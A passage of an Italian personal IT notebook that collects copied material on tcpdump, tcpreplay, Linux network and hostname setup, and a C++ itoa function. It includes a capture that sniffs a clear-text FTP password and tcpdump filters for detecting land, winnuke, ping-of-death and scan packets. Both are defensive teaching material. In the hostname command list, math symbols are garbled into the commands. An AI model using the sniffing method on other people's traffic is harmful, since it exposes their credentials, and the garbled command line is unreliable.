#tcpdump -A Packets capture during a FTP connection. The FTP password can be easily intercepted because it is sent in clear text to the server.

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on ath0, link-type EN10MB (Ethernet), capture size 96 bytes 20:53:24.872785 IP ubuntu.local.40205 > 192.168.1.2.ftp: S 4155598838:4155598838(0) win 5840 ....g.................... ............ 20:53:24.879473 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 1228937421 win 183 ....g.I@............. ........ 20:53:24.881654 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 43 win 183 [email protected]..... ......EN 20:53:26.402046 IP ubuntu.local.40205 > 192.168.1.2.ftp: P 0:10(10) ack 43 win 183 ....g.I@......`$..... ...=..ENUSER teddybear

20:53:26.403802 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 76 win 183 ....h.I@............. ...>..E^ 20:53:29.169036 IP ubuntu.local.40205 > 192.168.1.2.ftp: P 10:25(15) ack 76 win 183 ....h.I@......#c..... ......E^PASS wakeup

20:53:29.171553 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 96 win 183 ....h.I@.,........... ......Ez 20:53:29.171649 IP ubuntu.local.40205 > 192.168.1.2.ftp: P 25:31(6) ack 96 win 183 ....h.I@.,........... ......EzSYST

20:53:29.211607 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 115 win 183 ....h.I@.?.....j..... ......Ez 20:53:31.367619 IP ubuntu.local.40205 > 192.168.1.2.ftp: P 31:37(6) ack 115 win 183 ....h.I@.?........... ......EzQUIT

20:53:31.369316 IP ubuntu.local.40205 > 192.168.1.2.ftp: . ack 155 win 183 [email protected]........... ......E. 20:53:31.369759 IP ubuntu.local.40205 > 192.168.1.2.ftp: F 37:37(0) ack 156 win 183 [email protected]..... ......E.

We see in this capture the FTP username (teddybear) and password (wakeup).

Page 20: Appunti Informatica

Complete list of byte offsets for filtering with TCPDump ( Linux )

After wandering the net for TCPDump papers I've found some quite good info for those dealing with large traffic log files; TCPDump Bit masking. Filtering with TCPDump using bit masking ends up to be a good practicing tool (and also very helpful) for those seeking a solid knowledge on tcpdump applicabillity.

If you do a search about bitmasking you will find more information on this subject. Click Here for more info.

Expressions Code:

[x:y]      start at offset x from the beginning of packet and read y bytes [x]      abbreviation for [x:1] proto[x:y]   start at offset x into the proto header and read y bytes

p[x:y] & z = 0   p[x:y] has none of the bits selected by z p[x:y] & z != 0   p[x:y] has any  of the bits selected by z p[x:y] & z = z   p[x:y] has all  of the bits selected by z p[x:y] = z   p[x:y] has only    the bits selected by z

IP byte offsets Code:

ip[0] & 0x0f      - protocol version ip[0] & 0xf0      - protocol options ip[0] & 0xff00      - internet header length ip[1]         - TOS ip[2:2]         - Total length ip[4:2]         - IP identification ip[6] & 0xa      - IP flags ip[6:2] & 0x1fff    - fragment offset area ip[8]         - TTL ip[9]         - protocol field ip[10:2]      - header checksum ip[12:4]      - src IP address ip[16:4]      - dst IP address ip[20:3]      - options ip[24]         - padding

TCP byte offsets Code:

tcp[0:2]      - src port tcp[2:2]      - dst port tcp[4:4]      - seq number tcp[8:4]      - ack number tcp[12] & 0x00ff   - data offset tcp[12] & 0xff00   - reserved tcp[13]         - tcp flags

tcp[13] & 0x3f = 0   - no flags set (null packet) tcp[13] & 0x11 = 1   - FIN set and ACK not set tcp[13] & 0x03 = 3   - SYN set and FIN set tcp[13] & 0x05 = 5   - RST set and FIN set tcp[13] & 0x06 = 6   - SYN set and RST set tcp[13] & 0x18 = 8   - PSH set and ACK not set tcp[13] & 0x30 = 0x20   - URG set and ACK not set tcp[13] & 0xc0 != 0   - >= one of the reserved bits of tcp[13] is set tcp[14:2]      - window tcp[16:2]      - checksum

Page 21: Appunti Informatica

tcp[18:2]      - urgent pointer tcp[20:3]      - options tcp[23]         - padding tcp[24]         - data

Detail on Flags:

Flags      Numerically      Meaning =====      ===========      ======= ---- --S-   0000 0010 = 0x02   normal syn ---A --S-   0001 0010 = 0x12   normal syn-ack ---A ----   0001 0000 = 0x10   normal ack --UA P---   0011 1000 = 0x38   psh-urg-ack. interactive stuff like ssh ---A -R--   0001 0100 = 0x14   rst-ack. it happens. ---- --SF   0000 0011 = 0x03   syn-fin scan --U- P--F   0010 1001 = 0x29   urg-psh-fin. nmap fingerprint packet -Y-- ----   0100 0000 = 0x40   anything >= 0x40 has a reserved bit set XY-- ----   1100 0000 = 0xC0   both reserved bits set XYUA PRSF   1111 1111 = 0xFF   FULL_XMAS scan

UDP byte offsets Code:

udp[0:2]      - src port udp[2:2]      - dst port udp[4:2]      - length udp[6:2]      - checksum udp[8:4]      - first 4 octets of data

ICMP byte offsets Code:

icmp[0]         - type icmp[1]         - code icmp[3:2]      - checksum

Destination Unreachable: icmp[0] = 0x3 (3)

icmp[4:4]      - unused (per RFC] icmp[8:4]      - internet header + 64 bits original data icmp[1]         - 0 = net unreachable;          - 1 = host unreachable;          - 2 = protocol unreachable;          - 3 = port unreachable;          - 4 = fragmentation needed and DF set;          - 5 = source route failed.

Time Exceeded: icmp[0] = 0xB (11)   

icmp[4:4]      - unused (per RFC] icmp[8:4]      - internet header + 64 bits original data icmp[1]         - 0 = TTL exceeded intransit          - 1 = fragment reassembly time exceeded

Parameter Problem: icmp[0] = 0xC (12)   

icmp[1]         - 0 = pointer indicates error icmp[4]         - pointer icmp[5:3]      - unused, per RFC icmp[8:4]      - internet header + 64 bits original data

Page 22: Appunti Informatica

Source Quench: icmp[0] = 0x4 (4)

icmp[1]         - 0 = may be received by gateway or host icmp[4:4]      - unused, per RFC icmp[8:4]      - internet header + 64 bits original data

Redirect Message: icmp[0] = 0x5 (5)

icmp[1]         - 0 = redirect for network          - 1 = redirect for host          - 2 = redirect for TOS & network          - 3 = redirect for TOS & host icmp[4:4]      - gateway internet address icmp[8:4]      - internet header + 64 bits original data

Echo/Echo Reply: icmp[0]   = 0x0 (0) (echo reply) icmp[0]   = 0x8 (8) (echo request)

icmp[4:2]      - identifier icmp[6:2]      - sequence number icmp[8]         - data begins        Timestamp/Timestamp Reply: icmp[0] = 0xD (13) (timestamp request) icmp[0] = 0xE (14) (timestamp reply)

icmp[1]         - 0 icmp[4:2]      - identifier icmp[6:2]      - sequence number icmp[8:4]      - originate timestamp icmp[12:4]      - receive timestamp icmp[16:4]      - transmit timestamp

Information Request/Reply: icmp[0] = 0xF (15) (info request) icmp[0] = 0x10  (16) (info reply)

icmp[1]         - 0 icmp[4:2]      - identifier icmp[6:2]      - sequence number

Address Mask Request/Reply: icmp[0] = 0x11 (11) (address mask request) icmp[0] = 0x12 (12) (address mask reply)

Examples...: Code:

is some kind of SYN-FIN (tcp[13] & 0x03) = 3

land attack ip[12:4] = ip[16:4]

winnuke (tcp[2:2] = 139) && (tcp[13] & 0x20 != 0) && (tcp[19] & 0x01 = 1)

things other than ACK/PSH (tcp[13] & 0xe7) != 0

Page 23: Appunti Informatica

initial fragments (ip[6] & 0x20 != 0) && (ip[6:2] & 0x1fff = 0)

intervening fragments (ip[6] & 0x20 != 0) && (ip[6:2] & 0x1fff != 0)

terminal fragments (ip[6] & 0x20 = 0) && (ip[6:2] & 0x1fff != 0)

has ip options (ip[0] & 0x0f) != 5

ping o' death and its ilk ((ip[6] & 0x20 = 0) && (ip[6:2] & 0x1fff != 0)) && \ ((65535 < (ip[2:2] + 8*(ip[6:2] & 0x1fff))

You can grab source information here: http://packet.node.to/hacks/byte_offsets.txt

Enjoy.

Alcune funzioni da me comunemente utilizzate:

[root@DRMU_DR receiverFON]# tcpdump -xX -s0 -i eth1 udp[8:4]=0x6492004c and src 193.168.8.241 and dst 225.168.8.76 and port 20767

tcpdump –s0 –i eth1 udp and src xxx.yyy.www.zzz –w <NOMEFILE>

[-s0 serve a non avere i pacchetti spezzati a 68]

Page 24: Appunti Informatica

tcpreplay (Linux)From: http://tcpreplay.synfin.net/trac/wiki/tcpreplay

Overview

tcpreplay has evolved quite a bit over the years. In the 1.x days, it merely read packets and sent then back on the wire. In 2.x, tcpreplay was enhanced significantly to add various rewriting functionality but at the cost of complexity, performance and bloat. Now in 3.x, tcpreplay has returned to its roots to be a lean packet sending machine and the editing functions have moved to tcprewrite and a powerful tcpreplay-edit which combines the two.

Basic Usage

To replay a given pcap as it was captured all you need to do is specify the pcap file and the interface to send the traffic out interface 'eth0':

# tcpreplay --intf1=eth0 sample.pcap

Replaying at different speeds

You can also replay the traffic at different speeds then it was originally captured. Some examples:

To replay traffic as quickly as possible:

# tcpreplay --topspeed --intf1=eth0 sample.pcap

To replay traffic at a rate of 10Mbps:

# tcpreplay --mbps=10.0 --intf1=eth0 sample.pcap

To replay traffic 7.3 times as fast as it was captured:

# tcpreplay --multiplier=7.3 --intf1=eth0 sample.pcap

To replay traffic at half-speed:

# tcpreplay --multiplier=0.5 --intf1=eth0 sample.pcap

To replay at 25 packets per second:

# tcpreplay --pps=25 --intf1=eth0 sample.pcap

To replay packets, one at a time while decoding it (useful for debugging purposes):

# tcpreplay --oneatatime --verbose --intf1=eth0 sample.pcap

Replaying files multiple times

Using the loop flag you can specify that a pcap file will be sent two or more times:

To replay the sample.pcap file 10 times:

Page 25: Appunti Informatica

# tcpreplay --loop=10 --intf1=eth0 sample.pcap

To replay the sample.pcap an infinitely or until CTRL-C is pressed:

# tcpreplay --loop=0 --intf1=eth0 sample.pcap

If the pcap files you are looping are small enough to fit in available RAM, consider using the --enable-file-cache option. This option caches each packet in RAM so that subsequent reads don't have to hit the slower disk. It does have a slight performance hit for the first iteration of the loop since it has to call malloc() for each packet, but after that it seems to improve performance by around 5-10%. Of course if you don't have enough free RAM, then this will cause your system to swap which will dramatically decrease performance.

Another useful option is --quiet. This suppresses printing out to the screen each time tcpreplay starts a new iteration. This can have a dramatic performance boost for systems with slower consoles.

Advanced Usage

Splitting Traffic Between Two Interfaces

By utilizing tcpprep cache files, tcpreplay can split traffic between two interfaces. This allows tcpreplay to send traffic through a device and emulate both client and server sides of the connection, thereby maintaining state. Using a tcpprep cache file to split traffic between two interfaces (eth0 & eth1) with tcpreplay is simple:

# tcpreplay --cachefile=sample.prep --intf1=eth0 --intf2=eth1 sample.pcap

Viewing Packets as They are Sent

The --verbose flag turns on basic tcpdump decoding of packets. If you would like to alter the way tcpreplay invokes tcpdump to decode packets, then you can use the --decode flag. Note: Use of the --verbose flag is not recommended when performance is important. Please see the tcpdump(1) man page for options to pass to the --decode flag.

Choosing a Timing Method

tcpreplay as of v3.3.0 now supports multiple methods for creating delays between two packets.

First a refresher:

There are 1,000 milliseconds (msec) in 1 second There are 1,000,000 microseconds (usec) in 1 second There are 1,000,000,000 nanoseconds (nsec) in 1 second

And a little math:

Let's say you want to send 125,000 packets/sec (pps). That means you need to send a packet on average every 8usec. That's doable on most hardware assuming you can find a timing method with 1usec accuracy. The problem gets a lot more difficult when you want to send at 130,000 pps- now you need 7.7usec delay, requiring .1usec accuracy! That's a 10x increase in accuracy for a small change in performance. Most timing methods on general purpose hardware/software can't do that.

So what are the expected accuracies of each timing method?

Page 26: Appunti Informatica

nanosleep() - Theoretically 1nsec accuracy, but is probably closer to 1usec. Can be off by up to +/- 10msec depending on the operating system.

gettimeofday() - 1usec accuracy at best OS X's AbsoluteTime() - 1nsec accuracy select() - Theoretically 1usec accuracy, but tends to be off by +/- 10msec IO Port 80 - 1usec accuracy, but can cause crashes with certain versions of hardware/OS's Intel/AMD/SPARC RDTSC - Theoretically better then 1usec accurate, but many recent multi-core

Intel CPU's are horribly inaccurate and unusable Intel HPET - A 10Mhz timer giving .1usec accuracy

As you see above, only AbsoluteTime and the HPET provide the necessary resolution to hit our 130,000pps mark. Hence, if you're using one of the other methods, I'll use weighted averages or rounding to provide better accuracy. What that means is, when each packet is being sent at a constant rate (packets/sec) I'll sleep 8usec 7 times, and then 7usec 3 times to average out to the necessary 7.7usec. If you're using a variable timing method (Mbps or multiplier) then I'll round to the nearest 1usec (8usec in this case of 7.7usec)- the hope is that over many packets, it will average out correctly.

AbsoluteTime

So what does this all mean? Well, if you're running OS X, then using --timer=abstime is the clear winner. After that it gets more complicated. AbsoluteTime is currently the only timing method which doesn't need weighted averages or rounding.

HPET/gettimeofday

First, tcpreplay currently doesn't have native support for the Intel HPET. The good news is that some operating systems (like recent Linux kernels) use the HPET for calls to gettimeofday(). So while you loose some accuracy (gettimeofday() is accurate to 1usec no matter what the underlying implementation looks like), it's probably the best option for non-OS X users. If your gettimeofday() isn't backed by the HPET, you can still use it, just realize it might be a bit unreliable. Even if your gettimeofday() uses the HPET, you still only get 1usec accuracy, so part about using weighted averages and rounding still applies. Specify --timer=gtod to use gettimeofday()

nanosleep

Some implimentations of nanosleep() are good, others are horrible- it even may depend on how long you're sleeping for since the implementation might switch between going to sleep (bad) or using a tight loop (good). Generally speaking it's worth trying: --timer=nano

RDTSC

Using the RDTSC via --timer=rdtsc. This tends to work great on some hardware and is completely worthless for others. I've got an Intel P4 3.2Ghz box which it works great on, but my Core2Duo MacBook Pro is really bad. If you don't specify a --rdtsc-clicks value, tcpreplay will introduce a short delay on startup in order to calculate this value. If your hardware has a properly working RDTSC it's usually the speed of the processor (expressed in Mhz, so a 3.2Ghz CPU == --rdtsc-clicks=3200) or a fraction thereof.

IO Port 80

I don't have much experience with this, so give it a try and let me know what you find: --timer=ioport

select

This is crap for 99% of the situations out there. Hence you probably don't want to specify --timer=select

Page 27: Appunti Informatica

Accelerating Time

Regardless of which timing method you use, you can try specifying --sleep-accel to reduce the amount of time to sleep in usec. I've found this is useful for providing a "fudge factor" in some cases.

Tuning for High-Performance

Choosing a Packet Interval Method

The first recommendation is simple, use: --topspeed. This will always be the fastest method to send packets. If however you need some level of control, using --pps to specify packets/second is recommended. Using --pps-multi will cause multiple packets to be sent between each sleep interval, thus providing higher throughput potential then just --pps alone, but at the cost of traffic being more "spikey" then flat. Higher --pps-multi values improve performance and make the traffic more "spikey".

Using --mbps or --multiplier for high performance situations is not recommended as the overhead for calculating packet intervals tends to limit real world throughput.

Tuning your Operating System/Hardware

Regardless of the size of physical memory, UNIX kernels will only allocate a static amount for network buffers. This includes packets sent via the "raw" interface, like with tcpreplay. Most kernels will allow you to tweak the size of these buffers, drastically increasing performance and accuracy.

NOTE: The following information is provided based upon my own experiences or the reported experiences of others. Depending on your hardware and specific hardware, it may or may not work for you. It may even make your system horribly unstable, corrupt your harddrive, or worse.

NOTE: Different operating systems, network card drivers, and even hardware can have an effect on the accuracy of packet timestamps that tcpdump or other capture utilities generate. And as you know: garbage in, garbage out.

NOTE: If you have information on tuning the kernel of an operating system not listed here, please send it to me so I can include it.

General Tips

1. Use a good network card. This is probably the most important buying decision you can make. I recommend Intel e1000 series cards. El-cheapo cards like Realtek are known to give really crappy performance.

2. Tune your OS. See below for recommendations. 3. Faster is better. If you want really high-performance, make sure your disk I/O, CPU and the like is up

to the task. 4. For more details, check out the FAQ 5. If you're looping file(s), make sure you have enough free RAM for the pcap file(s) and use --enable-

file-cache 6. Use --quiet 7. Use --topspeed or --pps and a high value for --pps-multi 8. Use tcprewrite to pre-process all the packet editing instead of using tcpreplay-edit

Linux

Page 28: Appunti Informatica

The following is known to apply to the 2.4.x and 2.6.x series of kernels. By default Linux's tcpreplay performance isn't all that stellar. However, with a simple tweak, relatively decent performance can be had on the right hardware. By default, Linux specifies a 64K buffer for sending packets. Increasing this buffer to about half a megabyte does a good job:

echo 524287 >/proc/sys/net/core/wmem_default echo 524287 >/proc/sys/net/core/wmem_max echo 524287 >/proc/sys/net/core/rmem_max echo 524287 >/proc/sys/net/core/rmem_default

On one system, we've seen a jump from 23.02 megabits/sec (5560 packets/sec) to 220.30 megabits/sec (53212 packets/sec) which is nearly a 10x increase in performance. Depending on your system and capture file, different numbers may provide different results.

*BSD

*BSD systems typically allow you to specify the size of network buffers with the NMBCLUSTERS option in the kernel config file. Experiment with different sizes to see which yields the best performance. See the options(4) man page for more details.

Miche:

Io ho usato i seguenti comandi per registrar replayare:

tcpdump –s0 –i eth1 udp and src xxx.yyy.www.zzz –w <NOMEFILE>

[-s0 serve a non avere i pacchetti spezzati a 68]

tcpreplay –i eth1 <NOMEFILE>

Su fddi ci sono dei problemi in quanto andrebbe definito l’header usato per il trasporto su quel layer.

Page 29: Appunti Informatica

Setting the Linux Host NameUpdated February 12, 2004

Checking your Linux host name

First, see if your host name is set correclty using the following commands: uname -nhostname -ahostname -shostname -dhostname -𝑓,𝑥.=,𝑎-0.+,𝑛=1-∞-,,𝑎-𝑛.,cos-,𝑛𝜋𝑥-𝐿..+,𝑏-𝑛.,sin-,𝑛𝜋𝑥-𝐿....hostname

If the above commands return correctly with no errors then all may be well; however, you may want to read on to verify that all settings are correct.

Configuring /etc/hosts

If your IP address is assigned to you by a DHCP server, then /etc/hosts is configured as follows: 127.0.0.1 mybox.mydomain.com localhost.localdomain localhost mybox

If you have a static IP address, then /etc/hosts is configured as follows: 127.0.0.1 localhost.localdomain localhost192.168.0.10 mybox.mydomain.com mybox

Setting the Host Name using "hostname"

After updating the /etc/hosts file correctly, the "hostname" command should be run as follows to set your hostname:

hostname mybox.mydomain.com

Checking /etc/HOSTNAME (if present)

You may or may not have the file /etc/HOSTNAME:

mybox.mydomain.com

Checking /etc/sysconfig/network

If you have a static IP address, then /etc/sysconfig/network is configured as follows: NETWORKING=yesHOSTNAME="mybox.mydomain.com"...

Page 30: Appunti Informatica

If your IP address is assigned to you by a DHCP server, and you wish to update the local DNS server through Dynamic DNS, then /etc/sysconfig/network is configured as follows: NETWORKING=yesHOSTNAME="mybox.mydomain.com"DHCP_HOSTNAME="mybox.mydomain.com"...

It makes more sense to move this "DHCP_HOSTNAME" variable into /etc/sysconfig/network-scripts/ifcfg-eth0 (or appropriate NIC cfg file). So the above section has been moved, see below. If you have only 1 NIC, then the above struck section works fine, but with more than 1 NIC it makes no sense. Maybe this is true for the "'HOSTNAME" line too, maybe that line should be moved into /etc/sysconfig/network-scripts/ifcfg-eth0 as well. I will investigate further. By default RHL places HOSTNAME=localhost.localdomain in /etc/sysconfig/network.

Checking /proc/sys/kernel/hostname

This is checked with the following command: cat /proc/sys/kernel/hostname

If you need to set this file, you can either reboot or set it now with the following command: echo mybox.mydomain.com > /proc/sys/kernel/hostname

Dynamic DNS - Updating the local DNS server with your host name and DHCP IP

For Red Hat Linux if you receive your IP address from a DHCP server, you may update the local DNS server by adding the following line to the correct ifcfg file in /etc/sysconfig/network-scripts, such as ifcfg-eth0 or ifcfg-eth1: DHCP_HOSTNAME="mybox.mydomain.com"

or if running Debian, edit /etc/network/interfaces as follows (adding the hostname line): iface eth0 inet dhcp hostname mybox.mydomain.com

Updated information about ddns:Kill the dhclient process ("killall dhclient") - make sure it is goneThen restart networking - "service network restart"

Updated information for ddns on Gentoo:killall dhclientEdit /etc/conf.d/netuncomment and modify the line as follows:dhcpcd_eth0="-h yourhostname"reboot or restart your network subsystem

Thanks to Jack for the Gentoo information!

For more info in Debian, see "man interfaces" and scroll down to"The dhcp Method".

WINS - Updating the local WINS server with your host name and IP

Page 31: Appunti Informatica

If you wish to update the local WINS server, then use SAMBA, and configure it to point to the local WINS server. samba.html i.e. update the /etc/samba/smb.conf "wins server = " entry with the WINS server addresses for your network - be sure not to enable "wins support = yes" as that will make Linux a WINS server.

Changing the hostname while in X-Windows

Changing the hostname while in X-Windows can be problematic. Most often, new windows cannot be opened. Either 1. change the hostname while the X-Windows is not running or 2. in X-Windows change the hostname, then restart X-Windows.

Page 32: Appunti Informatica

Itoa (C/C++)

(Preso da http://www.jb.man.ac.uk/~slowe/cpp/itoa.html)

Arrgghh C/C++! It would appear that itoa() isn't ANSI C standard and doesn't work with GCC on Linux (at least the version I'm using). Things like this are frustrating especially if you want your code to work on different platforms (Windows/Linux/Solaris/whatever). Before we go any further, I would like to say thanks to the people that contributed to the solutions below.

Many people say that you should just use sprintf to write to a character string but that doesn't allow for one of the features of itoa(); the ability to write in a base other than 10. This page contains a series of evolving versions of an itoa implementation. The oldest are near the top and the newest at the bottom.

/** * C++ version char* style "itoa": */char* itoa( int value, char* result, int base ) {

// check that the base if valid

if (base < 2 || base > 16) { *result = 0; return result; }

char* out = result;int quotient = value;do {

*out = "0123456789abcdef"[ std::abs( quotient % base ) ];++out;quotient /= base;

} while ( quotient );

// Only apply negative sign for base 10

if ( value < 0 && base == 10) *out++ = '-';std::reverse( result, out );*out = 0;return result;

}

/** * C++ version std::string style "itoa": */std::string itoa(int value, int base) {

enum { kMaxDigits = 35 };std::string buf;buf.reserve( kMaxDigits ); // Pre-allocate enough space.

// check that the base if validif (base < 2 || base > 16) return buf;int quotient = value;// Translating number to string with base:do {

buf += "0123456789abcdef"[ std::abs( quotient % base ) ];quotient /= base;

} while ( quotient );// Append the negative sign for base 10if ( value < 0 && base == 10) buf += '-';std::reverse( buf.begin(), buf.end() );return buf;

}

Page 33: Appunti Informatica

TCP/IP Network Configuration Files: File: /etc/resolv.conf - host name resolver configuration file

search name-of-domain.com - Name of your domain or ISP's domain if using their name servernameserver XXX.XXX.XXX.XXX - IP address of primary name servernameserver XXX.XXX.XXX.XXX - IP address of secondary name server

This configures Linux so that it knows which DNS server will be resolving domain names into IP addresses. If using DHCP client, this will automatically be sent to you by the ISP and loaded into this file as part of the DHCP protocol. If using a static IP address, ask the ISP or check another machine on your network.

File: /etc/hosts - locally resolve node names to IP addresses

127.0.0.1 your-node-name.your-domain.com localhost.localdomain localhost XXX.XXX.XXX.XXX node-name

Note when adding hosts to this file, place the fully qualified name first. (It helps sendmail identify your server correctly) i.e.:

XXX.XXX.XXX.XXX superserver.yolinux.com superserver This informs Linux of local systems on the network which are not handled by the DNS server. (or for

all systems in your LAN if you are not using DNS or NIS) /etc/sysconfig/network

Red Hat network configuration file used by the system during the boot process.

File: /etc/nsswitch.conf - System Databases and Name Service Switch configuration file

hosts: files dns nisplus nis

This example tells Linux to first resolve a host name by looking at the local hosts file(/etc/hosts), then if the name is not found look to your DNS server as defined by /etc/resolv.conf and if not found there look to your NIS server.

In the past this file has had the following names: /etc/nsswitch.conf, /etc/svc.conf, /etc/netsvc.conf, ... depending on the distribution.

File: /etc/sysconfig/network-scripts/ifcfg-eth0 Configuration settings for your first ethernet port (0). Your second port is eth1.

File: /etc/modules.conf (or for older systems: /etc/conf.modules) Example statement for Intel ethernet card:

alias eth0 eepro100

Modules for other devices on the system will also be listed. This tells the kernel which device driver to use if configured as a loadable module. (default for Red Hat)

Fedora / Red Hat Network GUI Configuration Tools:The following GUI tools edit the system configuration files. There is no difference in the configuration developed with the GUI tools and that developed by editing system configuration files directly.

Page 34: Appunti Informatica

TCP/IP ethernet configuration: Network configuration:

/usr/sbin/system-config-

network (FC-2/3) GUI shown here ---> /usr/bin/redhat-config-

network (/usr/bin/neat) (RH 7.2+ FC-1)

Text console configuration tool: /usr/sbin/system-config-

network-tui (Fedora Core 2/3) /usr/bin/redhat-config-

network-tui (RH 9.0 - FC-1) Text console network configuration

tool. First interface only - eth0: /usr/sbin/netconfig

/usr/bin/netcfg (GUI) (last available with RH 7.1)

Gnome Desktop: Gnome Desktop Network

Configuration /usr/bin/gnome-network-

preferences (RH 9.0 - FC-3) Proxy configuration. Choose one of three options:

1. Direct internet connection 2. Manual proxy configuration

(specify proxy and port)

3. Automatic proxy configuration (give URL)

Assigning an IP address:Computers may be assiged a static IP address or assigned one dynamically.

Static IP address assignment:

Choose one of the following methods: Command Line: /sbin/ifconfig eth0 192.168.10.12 netmask 255.255.255.0 broadcast

192.168.10.255

Network address by convention would be the lowest: 192.168.10.0 Broadcast address by convention would be the highest: 192.168.10.255 The gateway can be anything, but following convention: 192.168.10.1

Note: the highest and lowest addresses are based on the netmask. The previous example is based on a netmask of 255.255.255.0

GUI tools:

Page 35: Appunti Informatica

o /usr/bin/neat Gnome GUI network administration tool. Handles all interfaces. Configure for Static IP or DHCP client. (First available with Red Hat 7.2.)

o /usr/bin/netcfg (Handles all interfaces) (last available in Red Hat 7.1) Console tool: /usr/sbin/netconfig (Only seems to work for the first network interface eth0 but not

eth1,...) Directly edit configuration files/scripts. See format below.

The ifconfig command does NOT store this information permanently. Upon reboot this information is lost. (Manually add the commands to the end of the file /etc/rc.d/rc.local to execute them upon boot.) The commands netcfg and netconfig make permanent changes to system network configuration files located in /etc/sysconfig/network-scripts/, so that this information is retained. The IANA has allocated IP addresses in the range of 192.168.0.0 to 192.168.255.255 for private networks. Helpful tools:

Cisco's IP Subnet calculator CIDR Conversion table - CIDR values, masks etc.

The Red Hat configuration tools store the configuration information in the file /etc/sysconfig/network. They will also allow one to configure routing information.

File: /etc/sysconfig/network

Static IP address Configuration: (Configure gateway address)

NETWORKING=yesHOSTNAME=my-hostname - Hostname is defined here and by command hostnameFORWARD_IPV4=true - True for NAT firewall gateways and linux routers. False for everyone else - desktops and servers.GATEWAY="XXX.XXX.XXX.YYY" - Used if your network is connected to another network or the internet. Static IP configuration. Gateway not defined here for DHCP client.

OR for DHCP client configuration:

NETWORKING=yesHOSTNAME=my-hostname - Hostname is defined here and by command hostname

(Gateway is assigned by DHCP server.)

File (Red Hat/Fedora): /etc/sysconfig/network-scripts/ifcfg-eth0 (S.u.s.e.: /etc/sysconfig/network/ifcfg-eth-id-XX:XX:XX:XX:XX)

Static IP address configuration:

DEVICE=eth0BOOTPROTO=staticBROADCAST=XXX.XXX.XXX.255IPADDR=XXX.XXX.XXX.XXXNETMASK=255.255.255.0NETWORK=XXX.XXX.XXX.0ONBOOT=yes

OR for DHCP client configuration: DEVICE=eth0ONBOOT=yesBOOTPROTO=dhcp

Page 36: Appunti Informatica

(Used by script /etc/sysconfig/network-scripts/ifup to bring the various network interfaces on-line) To disable DHCP change BOOTPROTO=dhcp to BOOTPROTO=none

In order for updated information in any of these files to take effect, one must issue the command: service network restart (or: /etc/init.d/network restart)

Changing the host name:This is a three step process:

1. Issue the command: hostname new-host-name 2. Change network configuration file: /etc/sysconfig/network

Edit entry: HOSTNAME=new-host-name 3. Restart systems which relied on the hostname (or reboot):

o Restart network services: service network restart (or: /etc/init.d/network restart)

o Restart desktop: Bring down system to console mode: init 3 Bring up X-Windows: init 5

One may also want to check the file /etc/hosts for an entry using the system name which allows the system to be self aware.

Network IP aliasing:Assign more than one IP address to one ethernet card: ifconfig eth0 XXX.XXX.XXX.XXX netmask 255.255.255.0 broadcast XXX.XXX.XXX.255 ifconfig eth0:0 192.168.10.12 netmask 255.255.255.0 broadcast 192.168.10.255 ifconfig eth0:1 192.168.10.14 netmask 255.255.255.0 broadcast 192.168.10.255

--------------------------------------------------------------------------------------MIO:Con questa soluzione non mi scrive il file /etc/sysconfig/network-scripts/ifcfg-eth0:0Invece funziona:

netconfig –d eth0:0 [--gateway=xxx.xxx.xxx.xxx] –ip=192.168.10.12 –netmask=255.255.255.0 Dopo un “service network restart” il file è correttamente scritto.--------------------------------------------------------------------------------------

route add -host XXX.XXX.XXX.XXX dev eth0 route add -host 192.168.10.12 dev eth0 route add -host 192.168.10.14 dev eth0

In this example 0 and 1 are aliases in addition to the regular eth0. The result of the ifconfig command: eth0 Link encap:Ethernet HWaddr 00:10:4C:25:7A:3F inet addr:XXX.XXX.XXX.XXX Bcast:XXX.XXX.XXX.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:14218 errors:0 dropped:0 overruns:0 frame:0 TX packets:1362 errors:0 dropped:0 overruns:0 carrier:0 collisions:1 txqueuelen:100 Interrupt:5 Base address:0xe400

Page 37: Appunti Informatica

eth0:0 Link encap:Ethernet HWaddr 00:10:4C:25:7A:3F inet addr:192.168.10.12 Bcast:192.168.10.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Interrupt:5 Base address:0xe400

eth0:1 Link encap:Ethernet HWaddr 00:10:4C:25:7A:3F inet addr:192.168.10.14 Bcast:192.168.10.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Interrupt:5 Base address:0xe400

Config file: /etc/sysconfig/network-scripts/ifcfg-eth0:0

DEVICE=eth0:0ONBOOT=yesBOOTPROTO=staticBROADCAST=192.168.10.255IPADDR=192.168.10.12NETMASK=255.255.255.0NETWORK=192.168.10.0ONBOOT=yes

Aliases can also be shut down independently. i.e.: ifdown eth0:0 The option during kernel compile is: CONFIG_IP_ALIAS=y (Enabled by default in Redhat) Note: The Apache web server can be configured so that different IP addresses can be assigned to specific domains being hosted. See Apache configuration and "configuring an IP based virtual host" in the YoLinux Web site configuration tutorial.

DHCP Linux Client: get connection info: /sbin/pump -i eth0 --status (Red Hat Linux 7.1 and older)

Device eth0IP: 4.XXX.XXX.XXXNetmask: 255.255.252.0Broadcast: 4.XXX.XXX.255Network: 4.XXX.XXX.0Boot server 131.XXX.XXX.4Next server 0.0.0.0Gateway: 4.XXX.XXX.1Domain: vz.dsl.genuity.netNameservers: 4.XXX.XXX.1 4.XXX.XXX.2 4.XXX.XXX.3Renewal time: Sat Aug 11 08:28:55 2001Expiration time: Sat Aug 11 11:28:55 2001

Activating and De-Activating your NIC:Commands for starting and stopping TCP/IP network services on an interface:

Activate: /sbin/ifup eth0 (Also: ifconfig eth0 up - Note: Even if no IP address is assigned you can listen.)

De-Activate: /sbin/ifdown eth0 (Also: ifconfig eth0 down)

These scripts use the scripts and NIC config

Page 38: Appunti Informatica

files in /etc/sysconfig/network-

scripts/ GUI Interface control/configuration:

Start/Stop network interfaces /usr/bin/system-

control-network (Fedora Core 2/3) /usr/bin/redhat-

control-network (RH 9.0 - FC-1)

Configure Ethernet, ISDN, modem, token Ring, Wireless or DSL network connection: /usr/sbin/system-

config-network-druid (FC2/3) /usr/sbin/redhat-

config-network-druid (RH 9 - FC-1)

Subnets:MASK # OF SUBNETS Slash

